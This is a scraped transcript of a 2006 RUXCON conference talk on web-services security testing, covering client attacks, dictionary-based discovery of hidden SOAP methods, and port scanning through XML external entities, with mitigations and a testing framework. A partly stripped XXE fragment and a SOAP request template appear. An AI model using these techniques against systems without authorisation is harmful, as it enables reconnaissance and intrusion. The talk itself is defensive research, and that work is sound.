Teaching a New Dog Old Tricks - PowerPoint PPT Presentation

1 / 33
About This Presentation
Title:

Teaching a New Dog Old Tricks

Description:

... a New Dog Old Tricks. Web Services. Daniel Grzelak / Colin ... Old Client Tricks. Similar to JavaScript attacks in web apps. Target the browser not the server ... – PowerPoint PPT presentation

Number of Views:151
Avg rating:3.0/5.0
Slides: 34
Provided by: edwardc
Category:
Tags: dog | new | old | teaching | tricks

less

Transcript and Presenter's Notes

Title: Teaching a New Dog Old Tricks


1
Teaching a New Dog Old Tricks
RUXCON 06
Web Services
Daniel Grzelak / Colin Wong
2
About Us
  • SIFT
  • Independent information security services
  • http//ww.sift.com.au/
  • Daniel Grzelak
  • Technical analyst
  • daniel.grzelak_at_sift.com.au
  • Colin Wong
  • Found him outside
  • colin.wong_at_sift.com.au

3
Outline
  • Web services basics
  • The past, the present, the future
  • Client testing
  • Web method enumeration
  • XML port scanning
  • Structured testing framework

4
Web Services Essentials
  • XML-based remote procedure call
  • Simple Object Access Protocol (SOAP)
  • Web Services Description Language (WSDL)
  • Multiple transport bindings
  • HTTP, SMTP, FTP etc.
  • Interoperable, heterogeneous, magical!
  • Oh yeah, aight. Aight, I put on my robe and
    wizard hat.

5
Why Test Web Services?
  • High enterprise take-up in high value projects
  • Authentication services
  • Supply chain integration (B2B)
  • Exposing legacy systems
  • External APIs
  • Transactions and critical business functions
  • Web services will become increasingly widespread

6
New Dog, Old Tricks
  • Web services share vulnerabilities with
    traditional distributed technologies
  • Lots of the same attacks apply but with better
    structure (XML)
  • Web services platforms make it too easy
  • Code web services as a traditional object
  • Platform automagically turns it into a service
  • Minimal (if any) security

7
Client Testing
  • Web services security testing tends to focus on
    the web service itself
  • Clients are most often custom made
  • These can also be vulnerable
  • Clients are where the users are at
  • Users are the weakest link
  • Own the client and you can attack the users

8
Old Client Tricks
  • Similar to JavaScript attacks in web apps
  • Target the browser not the server
  • Large client/server software houses have learnt
    to look at the client
  • Internet Explorer
  • Real Player
  • Web services clients get overlooked

9
Client Attacks
  • Evil twin
  • DNS hacking
  • ARP poisoning
  • Hard to execute blind, possession of the client
    helps
  • Testing
  • Consume WSDL and become the web service
  • Once client talks to cloned web service, fuzz
    outputs and analyse client app response
  • Thorough logging must exist

10
Web Method Enumeration
  • WSDL may not describe all allowed operations
  • Can be manually modified
  • Programmers love hidden backdoors
  • We would like to be able to find the secrets
  • Hidden administration interfaces or functions
  • Test or debug functions
  • Anything else were not supposed to get to

11
Web Method Search
  • Perform a dictionary attack on web method names
    in a web service
  • Typically in the form of
  • GetToken
  • AuthenticateUser
  • SetPassword
  • CreateAccount
  • Create or use ready-made verb and noun lists

12
Calling Web Methods
  • POST http//target.com/ HTTP/1.1
  • SOAPAction http//target.com/webMethodName
  • Content-Type text/xml encoding"utf-8"?
  • org/soap/envelope/" xmlnsxsi"http//www.w3.org/2
    001/XMLSchema-instance" xmlnsxsd"http//www.w3.o
    rg/2001/XMLSchema"
  • a

13
Analyse Responses
  • Test with each verb/noun combination
  • Analyse response of the web service
  • Can determine if the tested method exists
  • Combination exists
  • Successful call
  • Missing or incorrect parameter errors
  • Illegal argument or null reference errors
  • Combination does not exist
  • Operation not defined errors
  • No such operation or method
  • Bad SOAP action

14
Web Method Searching (For Bugs?)
  • No such operation 'get' at
  • org.apache.axis.providers.java.RPCProvider.process
    Message(RPCProvider.java179) at
  • org.apache.axis.providers.java.JavaProvider.invoke
    (JavaProvider.java323) at
  • coldfusion.xml.rpc.CFCProvider.invoke(CFCProvider.
    java54) at
  • org.apache.axis.strategies.InvocationStrategy.visi
    t(InvocationStrategy.java32) at
  • org.apache.axis.SimpleChain.doVisiting(SimpleChain
    .java118) at
  • org.apache.axis.SimpleChain.invoke(SimpleChain.jav
    a83) at
  • org.apache.axis.handlers.soap.SOAPService.invoke(S
    OAPService.java453) at
  • org.apache.axis.server.AxisServer.invoke(AxisServe
    r.java281) at
  • org.apache.axis.transport.http.AxisServlet.doPost(
    AxisServlet.java699) at
  • ...
  • coldfusion.bootstrap.BootstrapServlet.service(Boot
    strapServlet.java78) at
  • jrun.servlet.ServletInvoker.invoke(ServletInvoker.
    java91) at
  • jrun.servlet.JRunInvokerChain.invokeNext(JRunInvok
    erChain.java42) at
  • jrun.servlet.JRunRequestDispatcher.invoke(JRunRequ
    estDispatcher.java257) at
  • jrun.servlet.ServletEngineService.dispatch(Servlet
    EngineService.java541) at
  • jrun.servlet.jrpp.JRunProxyService.invokeRunnable(
    JRunProxyService.java204) at
  • jrunx.scheduler.ThreadPoolDownstreamMetrics.invok
    eRunnable(ThreadPool.java318) at
  • jrunx.scheduler.ThreadPoolThreadThrottle.invokeRu
    nnable(ThreadPool.java426) at

15
Web Method Searching (For Bugs?)
  • DirectoryException cannot automatically create
    subdirectory http at
  • null not in
    database (yet)
  • /home/sites/site66/web/_webservices/includes/nu
    soap/nusoap.php
    on line 3778

    / Warning Cannot modify header
    information - headers already sent by (output
    started at /home/sites/site66/web/_webservices/met
    asearch/index.php96)
  • Access violation at address 05605B9C
    in module 'testckver.tss'. Read of address
    0000000C
  • SQL syntax errors

16
Web Method Search Tool
  • Automated execution of dictionary attack with
    supplied wordlists
  • Analysis of responses against configurable
    response elements
  • Results may match multiple matters
  • Supports multiple weightings

17
Web Method Search Tool
  • Demonstration
  • http//www.sift.com.au/73/0/tools.htm

18
Workarounds and Mitigating Strategies
  • Security through obscurity does not work
  • Do not keep web methods secret because they will
    not remain secret
  • Input Validation

19
XML Port Scanning
  • Everyone loves XML
  • Has become the standard for information exchange
  • Ubiquitous support by all vendors and platforms
  • Firewalls block most traffic at the perimeter
  • Except maybe 80 and 443
  • Can we get behind the firewall to scan?
  • Maybe if we ask nicely

20
Traditional Port Scan
21
Document Type Definition
  • Allows you to define the valid elements of an XML
    document
  • Can dynamically build a DTD using references to
    external DTD definitions
  • Can define external entities that can be used
    within the XML document

22
XML Parser Abuse
  • Abuse the ability for XML parsers to dereference
    external sources
  • Use DTD elements to get the parser to initiate
    connections on our behalf
  • The following will cause the parser to attempt a
    connection to TCP port 22 on 192.168.1.1
  • "http//192.168.1.122/"
  • test

23
Analyse Responses
  • We can infer the result of the attempted
    connection from the XML parser response
  • Closed ports result in a connection refused error
  • Open ports that respond to a HTTP request result
    in other errors or no error at all
  • Filtered ports, no such target or open ports that
    do not respond to a HTTP request result in a
    timeout
  • Can only scan one port per XML document
  • Cycle through all target ports and systems

24
Applicability
  • This attack can be launched against XML endpoints
  • Cannot be used directly against SOAP
  • SOAP explicitly disallows DTD
  • Potential targets
  • AJAX APIs
  • XML document inputs
  • Encoded XML within SOAP parameters

25
Impacts
  • Port scanning of systems in your DMZ
  • Effectively transports the scanning to the parser
  • You can see whatever the XML parser can see
  • Firewalls wont help you
  • XML is valid traffic
  • SSL protects attack traffic

26
XML Port Scan
27
XML Port Scanning
  • Demonstration

28
Workarounds and Mitigating Strategies
  • Disable external entity elements
  • Or define allowed external elements
  • Prohibit DTDs
  • Exception handling that does not return error
    messages or details
  • Still allows timeouts to be detected
  • So some open ports can be detected
  • Closed ports return quickly

29
Structured Testing
  • Web services are popular
  • So is testing their security
  • However, no structured framework exists
  • i.e. no OWASP (although some OWASP projects touch
    on web services)
  • Security testing must be structured to be useful

30
Structured Testing Framework
  • Threat Modelling
  • Scoping
  • Test Planning
  • Test Execution
  • Reporting

31
Testing Categories
  • Information Gathering
  • Fuzzing
  • Injection
  • Confidentiality Integrity
  • Logging
  • Logic Flaws
  • Authentication Authorisation
  • Availability

32
Questions?
  • ?

33
Teaching a New Dog Old Tricks
RUXCON 06
Web Services
Colin Wong colin.wong_at_sift.com.auDaniel
Grzelak daniel.grzelak_at_sift.com.au
Write a Comment
User Comments (0)
About PowerShow.com